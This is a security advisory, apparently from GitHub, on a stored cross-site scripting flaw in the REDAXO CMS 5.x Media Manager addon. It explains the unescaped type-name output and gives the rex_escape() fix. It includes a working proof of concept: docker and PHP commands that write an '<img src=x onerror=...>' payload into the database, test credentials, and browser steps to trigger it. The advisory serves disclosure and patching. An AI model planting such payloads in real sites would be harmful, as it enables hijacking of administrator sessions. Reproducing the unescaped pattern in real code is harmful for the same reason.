A stored cross-site scripting (XSS) vulnerability exists in REDAXO CMS 5.x. When an administrator attempts to delete a media file that is referenced by a Media Manager effect, the warning message rendered in the backend includes the type's name field without HTML escaping. An attacker with access to the Media Manager addon can store an XSS payload as a type name; the payload executes in the browser of any administrator who subsequently tries to delete a media file linked to that type's effects. This can lead to session hijacking and full backend account takeover.
File: redaxo/src/addons/media_manager/lib/media_manager.php
Function: mediaIsInUse() — registered on the MEDIA_IS_IN_USE extension point in boot.php
When rex_media_service::deleteMedia() is called, it invokes rex_mediapool::mediaIsInUse($filename), which fires the MEDIA_IS_IN_USE extension point. The media_manager addon's handler queries all effects whose parameters JSON contains the filename, then constructs an HTML anchor with the type name inserted verbatim:
// media_manager.php ~line 457 ← VULNERABLE
$message = '<a href="javascript:openPage(\'' . rex_url::backendPage(...) . '\')">'
. rex_i18n::msg('media_manager') . ' '
. rex_i18n::msg('media_manager_effect_name') . ': '
. (string) $sql->getValue('name') // ← NO rex_escape() call
. '</a>';
The returned $message string is concatenated into the exception message thrown by deleteMedia() and rendered by rex_view::error() as raw HTML.
Contrast with the correct pattern used elsewhere in the same addon:
// types.php line 91 ← CORRECT
$name = '<b>' . rex_escape($list->getValue('name')) . '</b>';
Input validation gap: types.php line 200 validates the type name with the rule NOT_MATCH '{[/\\]}', which blocks {, /, and \ but permits <, >, ", ', and & — all characters required to inject HTML.
Test environment: REDAXO 5.x running at http://localhost/
Account required: Any REDAXO backend administrator
Test credentials: username admin / password Admin12345!
docker exec -i 34--core-5x-redaxo-1 php -r "$p=new PDO('mysql:host=db;dbname=redaxo','redaxo','redaxo');$p->exec(\"INSERT IGNORE INTO rex_media(category_id,attributes,filetype,filename,originalname,filesize,width,height,title,createdate,createuser,updatedate,updateuser) VALUES(0,'','image/jpeg','xss_test.jpg','xss_test.jpg',284,1,1,'XSS Test',NOW(),'admin',NOW(),'admin')\");$tid=$p->query(\"SELECT id FROM rex_media_manager_type WHERE name='<img src=x onerror=alert(document.domain)>'\")->fetchColumn();if(!$tid){$p->prepare(\"INSERT INTO rex_media_manager_type(status,name,description,createdate,createuser,updatedate,updateuser) VALUES(1,?,'poc',NOW(),'admin',NOW(),'admin')\")->execute(['<img src=x onerror=alert(document.domain)>']);$tid=$p->lastInsertId();}$p->prepare(\"INSERT IGNORE INTO rex_media_manager_type_effect(type_id,effect,parameters,priority,createdate,createuser,updatedate,updateuser) VALUES(?,'watermark',?,1,NOW(),'admin',NOW(),'admin')\")->execute([$tid,json_encode(['rex_effect_watermark'=>['watermark_image'=>'xss_test.jpg']])]);echo \"OK type_id=$tid\n\";"
docker exec 34--core-5x-redaxo-1 sh -c "printf '\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xdb\x00C\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07\x07\t\t\x08\n\x0c\x14\r\x0c\x0b\x0b\x0c\x19\x12\x13\x0f\x14\x1d\x1a\x1f\x1e\x1d\x1a\x1c\x1c $.\' \",#\x1c\x1c(7),01444\x1f\x27=82<.342\x1e>\x1b\x1b123\x1e4\x1c\x1f\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x1f\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\xff\xda\x00\x08\x01\x01\x00\x00?\x00\xf5\x00\xff\xd9' > /var/www/html/media/xss_test.jpg"
Open a browser and navigate to:
http://localhost/redaxo/index.php
Login with: admin / Admin12345!
Navigate to the media file detail page:
http://localhost/redaxo/index.php?page=mediapool/media&file_id=1
Click the Delete button. REDAXO checks whether the file is in use, finds the Watermark effect whose parameters JSON references xss_test.jpg, and renders the type name in the warning HTML without escaping.
Result: The browser executes <img src=x onerror=alert(document.domain)> and an alert dialog showing the current domain appears immediately.
Vulnerability type: Stored Cross-Site Scripting (Stored XSS)
Who is impacted: Any backend administrator who attempts to delete a media file that is referenced by a Media Manager effect. A malicious administrator (or an attacker who has compromised any admin account) can pre-plant a payload in a type name. All other administrators who later try to delete affected media files will have the payload executed in their browser sessions.
Exploitability:
Realistic attack scenarios:
document.cookie exfiltration (leads to full account takeover)Apply rex_escape() to the type name before concatenating it into the HTML anchor:
// media_manager.php — apply rex_escape() to the name value
$message = '<a href="javascript:openPage(\'' . rex_url::backendPage(...) . '\')">'
. rex_i18n::msg('media_manager') . ' '
. rex_i18n::msg('media_manager_effect_name') . ': '
. rex_escape((string) $sql->getValue('name')) // ← ADD rex_escape()
. '</a>';
{
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-09-23T14:04:40Z",
"nvd_published_at": null,
"severity": "MODERATE"
}